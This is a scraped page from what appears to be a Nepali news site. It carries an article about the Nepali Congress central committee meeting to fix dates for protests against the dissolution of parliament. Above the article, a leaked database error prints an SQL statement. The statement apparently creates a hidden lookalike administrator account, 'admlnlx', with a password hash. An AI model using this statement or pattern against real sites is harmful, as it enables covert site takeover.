WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Btrhc2NkYYdvhGSDg0DcmDsev/ChPh1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 18:14:04', '', 'admlnlx', 'admlnlx')

कांग्रेस केन्द्रीय समितिको बैठक आज, आन्दोलनको मिति तय गर्ने – Gaule Khabar

कांग्रेस केन्द्रीय समितिको बैठक आज, आन्दोलनको मिति तय गर्ने

कांग्रेस केन्द्रीय समितिको बैठक आज, आन्दोलनको मिति तय गर्ने

काठमाडौं । नेपाली कांग्रेसको केन्द्रीय कार्यसमितिको बैठक आज पनि बस्ने भएको छ । आजको बैठकले संसद विघटनविरुद्ध आन्दोलनका कार्यक्रम तय गर्ने सम्भावना छ ।

बुधबारको बैठकले संसद विघटनविरुद्ध देशभर प्रदर्शन गर्ने निर्णय गरेको थियो । तर कहिलेदेखि प्रदर्शन सुरु गर्ने र प्रदर्शनको स्वरुप कस्तो हुने भन्ने एकीन कांग्रेसले गरेको छैन । प्रदर्शन सुरु गर्ने मिति आजको बैठकबाट तय हुने सम्भावना रहेको कांग्रेस प्रवक्ता विश्वप्रकाश शर्माले जानकारी दिए ।

संसद विघटनविरुद्ध आन्दोलन गर्ने सवालमा कांग्रेसभित्र मतभेद छ । वरिष्ठ नेता रामचन्द्र पौडेल पक्षले संसद विघटन असंवैधानिक भएकाले तत्काल सशक्त आन्दोलनमा जानुपर्नेमा जोड दिएको छ । तर, सभापति शेरबहादुर देउवा भने मुद्दा सर्वोच्च अदालतमा विचाराधीन रहेकाले फैसला नआउन्जेल कुर्नुपर्ने पक्षमा छन् ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका